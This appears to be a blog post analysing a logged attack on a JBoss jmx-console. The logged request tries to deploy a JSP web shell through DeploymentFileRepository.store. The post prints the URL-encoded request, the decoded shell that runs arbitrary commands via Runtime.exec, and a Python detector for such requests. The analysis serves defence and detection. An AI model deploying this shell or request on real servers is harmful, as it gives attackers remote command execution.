

JBoss hack

Hacking JBoss by injection and execution of system commands

Web logs:

23:06:23,766 INFO  [org.jboss.web.tomcat.service.deployers.TomcatDeployment] deploy, ctxPath=/jmx-console
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]] REQUEST URI       =/jmx-console/HtmlAdaptor
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]           authType=null
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]  characterEncoding=null
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]      contentLength=-1
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]        contentType=null
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]        contextPath=/jmx-console
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             locale=fr_FR
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             method=HEAD
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=action=invokeOpByName
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=name=jboss.admin:service=DeploymentFileRepository
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=methodName=store
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=argType=java.lang.String, java.lang.String, java.lang.String, java.lang.String, boolean
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=arg0=zecmd.war
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=arg1=zecmd
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=arg2=.jsp
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=arg3=<%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION=""> <INPUT TYPE="text" NAME="comment"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("comment") != null) { out.println("Command: " + request.getParameter("comment") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML>
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=arg4=True
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]           pathInfo=null
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]           protocol=HTTP/1.0
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]        queryString=action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=zecmd.war&argType=java.lang.String&arg1=zecmd&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=True
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]         remoteAddr=192.168.30.254
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]         remoteHost=192.168.30.254
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]         remoteUser=null
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]] requestedSessionId=null
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             scheme=http
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]         serverName=PC-user.placeoweb.com
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]         serverPort=8080
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]        servletPath=/HtmlAdaptor
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]           isSecure=false
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]] ---
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]] ---
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]           authType=null
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]      contentLength=-1
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]        contentType=text/html;charset=utf-8
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             header=X-Powered-By=Servlet/3.0; JBossAS-6
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             header=Pragma=No-cache
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             header=Cache-Control=no-cache
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             header=Expires=Thu, 01 Jan 1970 01:00:00 CET
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             header=WWW-Authenticate=Basic realm="JBoss JMX Console"
23:06:23,834 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]            message=null
23:06:23,834 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]         remoteUser=null
23:06:23,834 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             status=401
23:06:23,834 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]] ===============================================================

URL-decoding the string:

%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e

we get a nice, classic HTML form whose JSP runs on the system, via Runtime.getRuntime().exec, whatever command is passed in its "comment" parameter. In this case the JMX console answered with status 401 and a Basic authentication challenge (WWW-Authenticate: Basic realm="JBoss JMX Console"), so the deployment was refused:

<%@ page import="java.util.*,java.io.*"%>
<% %>
<HTML>
<BODY>
<FORM METHOD="GET" NAME="comments" ACTION="">
  <INPUT TYPE="text" NAME="comment">
  <INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>  
<% 
		if (request.getParameter("comment") != null) {
			out.println("Command: " + request.getParameter("comment") + "<BR>");
			Process p = Runtime.getRuntime().exec(request.getParameter("comment"));
			OutputStream os = p.getOutputStream();
			InputStream in = p.getInputStream();
			DataInputStream dis = new DataInputStream(in);
			String disr = dis.readLine();
			while (disr != null) {
				out.println(disr);
				disr = dis.readLine();
			}
		}
%> 
</pre>
</BODY>
</HTML>
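As an added example (not code from the original post), here is a small Python script that reads a request dump of the shape shown above, URL-decodes the query string and flags a DeploymentFileRepository.store call through /jmx-console carrying a JSP that executes commands, reporting the source address and whether the console answered 401. The log sample inside is constructed after the dump above, with the JSP payload shortened.

```python
import re
from urllib.parse import parse_qs

# Constructed sample in the shape of the JBoss/Tomcat request dump above (not the post's log verbatim).
SAMPLE_LOG = """\
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]] REQUEST URI       =/jmx-console/HtmlAdaptor
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             method=HEAD
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]        queryString=action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=zecmd.war&argType=java.lang.String&arg1=zecmd&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%20Runtime.getRuntime().exec(request.getParameter(%22comment%22))%3b%20%25%3e&argType=boolean&arg4=True
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]         remoteAddr=192.168.30.254
23:06:23,834 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             status=401
"""

# key=value after the closing "]]" of the logger name; "REQUEST URI   =" has spaces inside the key
FIELD_RE = re.compile(r"\]\s+([\w ]+?)\s*=(.*)$")

def parse_request_dump(text):
    """Collapse the one-field-per-line dump into a dict (repeated keys such as 'parameter' keep the last value)."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.search(line)
        if m:
            fields[m.group(1).strip()] = m.group(2)
    return fields

def analyze(fields):
    """Flag a jmx-console DeploymentFileRepository.store call whose JSP argument runs commands."""
    qs = parse_qs(fields.get("queryString", ""), keep_blank_values=True)  # also percent-decodes
    first = lambda k: qs.get(k, [""])[0]
    finding = {
        "remote_addr": fields.get("remoteAddr"),
        "method": fields.get("method"),
        "status": fields.get("status"),
        "jmx_console": fields.get("REQUEST URI", "").startswith("/jmx-console/"),
        "deploy_attempt": first("action") == "invokeOpByName"
                          and "DeploymentFileRepository" in first("name")
                          and first("methodName") == "store",
        # as in the dump above, the first three String args are the folder, file name and extension written out
        "artifact": first("arg0") + "/" + first("arg1") + first("arg2"),
        "webshell_payload": "Runtime.getRuntime().exec" in first("arg3"),
    }
    # a 401 with the Basic-auth challenge means the console refused the call, as in the post
    finding["blocked"] = finding["status"] == "401"
    return finding

if __name__ == "__main__":
    f = analyze(parse_request_dump(SAMPLE_LOG))
    if f["deploy_attempt"] and f["webshell_payload"]:
        print("ALERT webshell deploy via jmx-console from %(remote_addr)s -> %(artifact)s, blocked=%(blocked)s" % f)
```

The same parser can be pointed at a real server.log; a matching request with status 200 instead of 401 is the case that warrants an incident response, since the JSP would then have been written and hot-deployed.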
